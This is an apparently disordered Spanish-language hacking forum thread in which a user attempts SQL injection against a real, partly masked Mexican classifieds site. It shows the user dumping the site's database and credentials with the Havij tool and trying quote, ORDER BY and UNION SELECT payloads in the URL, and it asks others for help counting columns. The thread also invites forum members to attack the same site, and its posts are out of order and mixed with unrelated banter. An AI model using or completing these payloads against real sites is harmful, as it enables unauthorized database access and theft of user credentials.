jajajaja no manches pa consejitos que se votan   :¬¬pero bueno como dicen los camaradas metele unas cachetadas guajoloteras para que se le quite a tu hermano

shales se me olvido quitar la pagina  pero bueno confio en ustedes que no le moveran nada si logran vulnerarla, y retomando el tema volteo0101 yo tambien ayer lo intente y no me aroja las columnas lo que no entiendo es por que con el programa si me la vulnera en ese mismo apartado 

yo uso power date recovery y file recoery algo asi se llaman funcionan perfecto

jajaja no manches

hola volteo0101 lo acabo de hacer asi como dices y me acorde que tambien en un pricipio asi le estaba haciendo ,solo me sigue arojando el mismo error este

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13
 
 

la url quedo asi

http://www.xxxx.com.mx/clasificados.php?tipo=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
 

estavez solo llegue hasta 50

hola amigos miren resulta que hay una web que es vulnerable a injection sql como lo se?? por medio de dos cosas la prime utilize un programa que posteo un usuario la herramienta se llama Havij el cual al poner el url de la pagina en menos de 2 minutos me arojo la bd junto con sus tablas y sus respectivos valores ustedes se preguntaran entonces para que quieres hacerlo manual mente si ya tienes hasta el nombre de usuario y contraseña del sistema  vos ser un lammer para nada amigos yo lo que deceo es aprender no me gusta navegar e ir destruyendo por que se que para montar una web se gasta y encuanto pueda descubrir el fallo  manualmente den lo por echo que lo reportare con el administrador del sitio  bueno miren la url tiene la siguiente estructura

http://www.xxxxx.com.mx/clasificados.php?tipo=10
en el post que publicaron aqui
http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.15.html
comentan que para saber siuna web es vulnerable basta con poner una comilla simple despues del numero yo lo puse de esta forma

http://www.xxxxx.com.mx/clasificados.php?tipo=10' 

el resultado que me arojo ffue el siguiente

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/[b]xopin[/b]/public_html/clasificados.php on line 13

entonces segun el tuto es vulnerable  la base de datos de esta web se llama xopin como estoy tan seguro?? por el programa que les mencione arriva bueno hasta ahi voy bien la dificultad comienza cuando deceo contar el numero de columnas lo intente de la siguiente forma

http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1,2,3,4,5,6,7 ect hasta llegar a 100
 

tambien lo intente asi

http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1 //iva cambiano el 1 por otro numero hasta llegar a 100
 

y sin resultados aa cabe mencionar que el error del warning siempre estuvo presente no cambio nada siempre estuvo de la siguiente forma

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13
 
 

intente hacerlo con union y tampoco me sale lo ise de la siguiente forma

http://www.xxxx.com.mx/clasificados.php?tipo=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ..ect llegue hasta 100
 
 

de igual forma el error del warning que da igual  , que puede estar pasando? hasta que numero debo de llegar para que me muestre el numero de columnas?

aok  si eso lei anoche incluso ya me descargue el compilador de  python-2.7.1 pero no quiere jalar nunca he utilizado phyton

simon vez como que nieva en tu pantalla verdad jajajaja

ya nenas luego se arrancan el calson

igualmente camarada aunque algunos del foro festejaron navidad por diferencia de paises .